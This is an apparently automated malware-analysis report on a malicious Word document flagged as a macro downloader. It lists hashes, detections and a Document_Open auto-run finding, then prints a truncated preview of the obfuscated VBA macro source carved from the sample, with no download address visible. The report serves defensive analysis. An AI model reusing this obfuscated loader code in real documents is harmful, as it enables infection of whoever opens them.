Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 50f26cc321183198…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 183.0 KB
Created: 2018-05-16 07:14:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 47e4f0b58a0bb4d73e476b8cc8011b22
SHA-1: babfbcd399d500a42fb4e0fb8fec18a0c11f20fd
SHA-256: 50f26cc321183198881fdb6e5652bc0f8abcc522b31c06c420dc6e0591a99099
Risk score: 122

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of the Document_Open macro and the downloader heuristic strongly suggests the intent is to fetch and run a secondary payload. No specific family could be identified due to the obfuscation.

Heuristics (4)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document contains a Document_Open auto-execution macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    All seven are XMP, RDF and Dublin Core namespace identifiers of the kind carried in embedded image metadata, not download locations; no URL was extracted from the macro code itself, so the downloader's fetch address is not visible in this static pass.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13205 bytes
SHA-256: a61e704674f9e04c2364b338428ffb6bdb09189cb1c8ca2bd66ed79862781eb2

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function headwind(bishops, garrotto, actinism)
Dim aftergame As String
Dim bissextile As String
Dim indispose As LongPtr
Dim climactic As LongPtr
Dim possibility As LongPtr
Dim fusel As Variant
Dim snatch As LongPtr
Dim extractable As LongPtr
discipleship = tail \ 194
tail = Math.Round(239)
climactic = bishops
extractable = actinism
shend = Rnd(341)
snatch = garrotto
dearest = 36 + 48
 Pmt 0, dearest, 19055, 37789, 3

mainspring = adenanthera
indispose = 95 - 52 - 44
doctrinally ByVal indispose, _
climactic, _
snatch, extractable, _
possibility
tail = Rnd(352)
End Function
Function trypetidae(affectedly)
Dim otterhound As Byte
Dim translatable As String
Dim salyut As Byte
Dim blahs As String
#If (90 - 102 + 412 + 27 - 92 + 365) > ((17 - 86 + 389) - (77 - 23 + 486) * 1) And ((88 - 42 - 18) - (56 - 31 + 3)) * 2 < (Win64) Then
Dim paean As Variant
Dim polemics As LongPtr
elaine = 16 - 72 + 64
Dim compromise As LongPtr
Dim catholicon As Variant
Dim centennially As Variant
Dim grindery As LongPtr
Dim ebenaceae As Byte
ovate = VarPtr(polemics)
photostat = headwind(ovate, VarPtr(affectedly) + (84 - 44 - 32), elaine)
#ElseIf (101 - 119 + 418 + 56 - 56 + 300) > ((35 - 17 + 302) - (37 - 102 + 605) * 1) And Not ((58 - 2 - 28) - (110 - 35 - 47)) * 2 < (Win64) Then
Dim polemics As Long
elaine = 57 - 19 - 34
Dim compromise As Long
Dim grindery As Long
ovate = VarPtr(polemics)
photostat = tripping(ovate, VarPtr(affectedly) + (101 - 75 - 18), elaine)
#End If
undeservedly = 65 - 3 - 63
compromise = 66 - 17 - 49
severely = 73 - 53 - 20
grindery = 10 - 17 + 9444
camber = 35 - 14 + 4075
barilla = 103 - 42 + 3
dinnertime = valuer(ByVal undeservedly, _
compromise, ByVal severely, grindery, ByVal camber, _
ByVal barilla)
shend = Fix(116)

oxygenase = "allodial"

#If (18 - 13 + 395 + 20 - 128 + 408) > ((2 - 74 + 392) - (13 - 20 + 547) * 1) And ((23 - 51 + 56) - (27 - 88 + 89)) * 2 < (Win64) Then
nidulariales = headwind(compromise, polemics, 107 - 28 + 5804)
#ElseIf (31 - 11 + 380 + 69 - 23 + 254) > ((97 - 112 + 335) - (29 - 43 + 554) * 1) And Not ((48 - 88 + 68) - (111 - 17 - 66)) * 2 < (Win64) Then
hypertensive = tripping(compromise, polemics, 106 - 96 + 5873)
#End If
micrometeoric = 19 + 13
 Pmt 0, micrometeoric, 25720, 50442, 3

trypetidae = compromise
End Function
Sub RemovePageNumbersFromCurrentSection()
    Dim ThisHeader As HeaderFooter
    Dim ThisPageNumber As PageNumber
    With Selection.Sections(1)
        For Each ThisHeader In .Headers
            For Each ThisPageNumber In ThisHeader.PageNumbers
                ThisPageNumber.Delete
            Next ThisPageNumber
        Next ThisHeader
    End With
End Sub

Function tripping(blacktopped, circus, lanky)
Dim abundance As Long
Dim carped As Integer
Dim photoelectrically As Long
Dim sago As Byte
Dim saipan As Long
Dim bottomlessness As Long
Dim aeonium As Long
Dim obliterated As Byte
Dim salable As Long
Dim doxepin As Variant
Dim blameworthy As Long
aeroplanist = Rnd(127)
adenanthera = "exigency"
abundance = blacktopped
salable = lanky
discipleship = Fix(414)
saipan = circus
corners = 19 + 3
 Pmt 0, corners, 27439, 57255, 2

tail = Rnd(424)
photoelectrically = 62 - 31 - 32
doctrinally ByVal photoelectrically, abundance, saipan, salable, aeonium
tail = Fix(483)
End Function
Sub bicephalous()
Dim attentively As Long
Dim chartism As Long
wake.condylar.Value = Day(#12/5/2013#)
varday = scaramouch = "marattiaceae"
party = "gysart"
bickering = "orycteropus"
comically = "blows"
crackloo = "crosse"

dispraise = congenialness
palanquin = "ampulla"
Set departer = wake.condylar.SelectedItem
scotch = 3 + 59
 Pmt 0, scotch, 23121, 25463, 3

laryngeal = departer.Name
query = 68 - 88 + 7864
... (truncated)